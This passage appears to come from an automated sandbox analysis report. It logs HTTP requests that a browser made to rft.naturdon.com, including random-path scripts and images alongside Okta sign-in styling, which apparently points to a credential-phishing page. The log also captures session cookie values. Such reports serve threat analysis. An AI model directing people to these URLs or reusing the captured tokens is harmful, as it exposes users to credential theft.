XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveOrigin: https://rft.naturdon.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveOrigin: https://rft.naturdon.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveOrigin: https://rft.naturdon.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveOrigin: https://rft.naturdon.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /56ybTuSQ1jJ6y8kcSz0CgEs2AYKij17gyitf7LX4hemrK89103 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250317%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250317T180234Z&X-Amz-Expires=300&X-Amz-Signature=67fc3c353eb56edfa294bd17ab3c652c5697ff24ded71c9260ffd2802241d25b&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /klZUXgOlh2u3Z2ys2P7suUE8OPsvE6D0NZcY24FlEVoyLh1rlCu0zJMqOpqgPM0t8xKY93rEWKezYEZUkbXH3MBDHfCQeW7aWFIDvpz4vU3PIiYP2CoSTMqCoZvmlMmOzASNryz660 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /klVMx7KVI7aqSsO73T4YmMDJiwpgOXnjl0kvOhd3fZAopRdu3RNdl8MlVtw7oEWHHR2t8JGp85UDgXLK6yz230 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /dezNUCB7F1KEsi0FN0wryA8y4av4n6Oz1WzLtiMGksrOn987oMYSmcxxtWYou2jfcMbVvmkb60VdA3wr1dwZEXuZoYuejWksgw45j3q4VZxbXQF10CkWdNYZxh3MHx6WHC7lGtJJ6scfMTtvSsNFNJCw93uLSr83gx6zpijd2MxlyhgcWIfR6tYb2L6cd662 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /wxR15iAruHCp5MR53stdlsbAewGX1FsavzlKmlR34130 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /rvBXzyX4Qq50i8TvtNXs8BpqNqxHqx6mzSSKcXalR4B6PLT8k9y HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /qrhmLtoaKGMi81xl8TzghJ99XVgOdtJgIR4uW45140 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 